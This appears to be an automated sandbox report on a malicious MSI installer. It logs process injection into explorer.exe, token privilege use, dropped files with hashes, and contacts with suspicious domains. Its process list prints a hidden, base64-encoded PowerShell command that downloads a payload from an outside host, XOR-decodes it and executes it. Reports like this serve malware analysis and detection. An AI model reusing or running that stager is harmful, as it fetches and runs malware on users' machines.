File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4644 set thread context of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIA87B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C35.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8DFC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8E99.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5786b4.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF8052F16E79F1A722.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5786b8.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF0C7C39F01A3AA06F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF61814C6C9DBA5244.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5786b4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8AFB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C15.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF829D7DB7C59C582F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8760.tmp C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3476 wrote to memory of 3384 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 2528 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3476 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 2360 wrote to memory of 4656 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 4656 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1648 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
PID 2360 wrote to memory of 1648 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 2360 wrote to memory of 2780 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3F99D94B248A7DE3803C63D3E3377CF1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8F9F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYwB1AHIAbABoAHUAYgAuAG0AbwBuAHMAdABlAHIALwBuAGUAdwBkAHIAbwBwAC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA

C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2236

Network

Country Destination Domain Proto
US 8.8.8.8:53 thecurl.monster udp
US 172.67.176.123:80 thecurl.monster tcp
US 172.67.176.123:443 thecurl.monster tcp
US 172.67.151.174:80 death1488.com tcp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 curlhub.monster udp
US 172.67.204.219:443 curlhub.monster tcp
US 8.8.8.8:53 219.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 172.67.195.205:80 raur94.com tcp
US 172.67.195.205:443 raur94.com tcp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 35.206.58.216.in-addr.arpa udp

Files

C:\Windows\Installer\MSI8760.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI8E99.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/2528-28-0x0000000002A40000-0x0000000002A76000-memory.dmp

memory/2528-29-0x00000000736B0000-0x0000000073E61000-memory.dmp

memory/2528-31-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

memory/2528-30-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

memory/2528-32-0x0000000005130000-0x000000000575A000-memory.dmp

memory/2528-33-0x00000000057B0000-0x00000000057D2000-memory.dmp

memory/2528-34-0x0000000005950000-0x00000000059B6000-memory.dmp

memory/2528-35-0x00000000059C0000-0x0000000005A26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdfd43f3.cmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2528-44-0x0000000005B20000-0x0000000005E77000-memory.dmp

memory/2528-45-0x0000000005F20000-0x0000000005F3E000-memory.dmp

memory/2528-46-0x0000000005F60000-0x0000000005FAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/2528-48-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

memory/2528-49-0x0000000007690000-0x0000000007D0A000-memory.dmp

memory/2528-50-0x0000000006490000-0x00000000064AA000-memory.dmp

memory/2528-51-0x0000000007210000-0x00000000072A6000-memory.dmp

memory/2528-52-0x0000000006520000-0x0000000006542000-memory.dmp

memory/2528-53-0x00000000082C0000-0x0000000008866000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

memory/2528-55-0x0000000007EE0000-0x00000000080A2000-memory.dmp

memory/2528-56-0x0000000008DA0000-0x00000000092CC000-memory.dmp

memory/2528-60-0x00000000736B0000-0x0000000073E61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt

MD5 eb0046beb949b23b97dccd59c4b8f131
SHA1 c084a9c15a323cd51d24122681a494e52577487f
SHA256 b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

C:\Config.Msi\e5786b7.rbs

MD5 31b2be250bc4c946918c24bca8f8aa92
SHA1 82ca9c2f47b796497cb7aa67021a7d7cf3c80a15
SHA256 307ebb2baaee3f92b260173205ecd3c78f141c9ea0a7196c60ea5deb01768462
SHA512 2ed84f9fc823d97311cd0b5f58a710c2ca81d31d414c871fce3440b0b658df9a939256f1bd7560af306ba43ea50254a7374795ed6e229ebbb61050493ad84eef

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

MD5 35365d3713500bde4e2e1422c54f04fa
SHA1 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

C:\Windows\Installer\e5786b4.msi

MD5 86a68878633d570e195609fe33640561
SHA1 5a5355a80750693493c4ff9d4184d3234ad62b73
SHA256 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92
SHA512 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 f74e6b15bbb4d3a8decb9fe17175d056
SHA1 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba
SHA256 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3
SHA512 5c896a916537cbf6e4f6c995a240b3e651356e5a5fc549058cc60892c5905e64a3fd78cf0998149ca88f474f9ce78c94ea398bd245735a1b242f497adb44bbf4

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

MD5 a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1 a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256 e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512 b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

MD5 b7b148054a2818699d93f96139b4d0d0
SHA1 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

memory/4644-155-0x00000000008B0000-0x00000000008B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

MD5 8f4cdaed2399204619310cd76fd11056
SHA1 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256 df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

MD5 0381964390751461a5d79d26ca7cedaa
SHA1 3b17b9dca5060f9b22920737165a6bd1de5e8941
SHA256 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da
SHA512 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

memory/4644-157-0x0000000001050000-0x0000000001075000-memory.dmp

memory/2360-159-0x00000000005C0000-0x00000000005E8000-memory.dmp

memory/2360-160-0x00000000005C0000-0x00000000005E8000-memory.dmp

memory/4644-162-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4644-163-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/2360-161-0x00000000005C0000-0x00000000005E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll

MD5 72498f59c8c580707a0a3839c332f51b
SHA1 fb09b912912610d243066cc8b71435f689e6a449
SHA256 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

memory/4644-164-0x0000000066580000-0x00000000666AA000-memory.dmp

memory/4644-166-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/2360-165-0x00000000005C0000-0x00000000005E8000-memory.dmp

memory/4644-167-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/4644-168-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4656-175-0x00007FF8231E0000-0x00007FF823CA2000-memory.dmp

memory/4656-182-0x000001FE75510000-0x000001FE75520000-memory.dmp

memory/4656-181-0x000001FE75510000-0x000001FE75520000-memory.dmp

memory/4656-183-0x000001FE74E50000-0x000001FE74E72000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f2460fed3060a114d76eb39c96163832
SHA1 0d94b2e590f03bd1dacd12d539288d5ba578db6a
SHA256 7562977b161dd9dc5d6bb23fc57358af12b7c7c0f435b648fe0befa1699253eb
SHA512 a97039de7444650ba177b93c84a47a418aa5c0b7387ba3bdf2203563556b41d951e7393c965cc012e0b7e11c048c0671c6f366bd8fef1cd0cdf390d0ea44af24

memory/4656-188-0x000001FE75510000-0x000001FE75520000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

memory/2360-223-0x00000000036C0000-0x00000000037C0000-memory.dmp

memory/2360-224-0x0000000003960000-0x00000000039E8000-memory.dmp

memory/4656-226-0x000001FE759B0000-0x000001FE759CC000-memory.dmp

memory/4656-251-0x000001FE75BA0000-0x000001FE75D62000-memory.dmp

memory/4656-252-0x000001FE762A0000-0x000001FE767C8000-memory.dmp

memory/4656-258-0x00007FF8231E0000-0x00007FF823CA2000-memory.dmp

memory/2360-259-0x0000000004B00000-0x0000000004F00000-memory.dmp

memory/2360-260-0x00000000005C0000-0x00000000005E8000-memory.dmp

memory/2360-262-0x0000000004B00000-0x0000000004F00000-memory.dmp

memory/2360-263-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp

memory/2360-264-0x0000000004B00000-0x0000000004F00000-memory.dmp

memory/2360-267-0x0000000077A81000-0x0000000077BA3000-memory.dmp

memory/2780-268-0x0000000000FC0000-0x0000000000FC9000-memory.dmp

memory/2360-266-0x0000000076CB0000-0x0000000076F02000-memory.dmp

memory/2780-271-0x0000000002DE0000-0x00000000031E0000-memory.dmp

memory/2780-270-0x0000000002DE0000-0x00000000031E0000-memory.dmp

memory/2780-272-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp

memory/2780-275-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp

memory/2780-273-0x0000000002DE0000-0x00000000031E0000-memory.dmp

memory/2780-276-0x0000000076CB0000-0x0000000076F02000-memory.dmp

memory/2780-279-0x0000000002DE0000-0x00000000031E0000-memory.dmp

memory/2780-281-0x00007FF843FA0000-0x00007FF8441A9000-memory.dmp

memory/2360-280-0x0000000003960000-0x00000000039E8000-memory.dmp

memory/2360-278-0x0000000004B00000-0x0000000004F00000-memory.dmp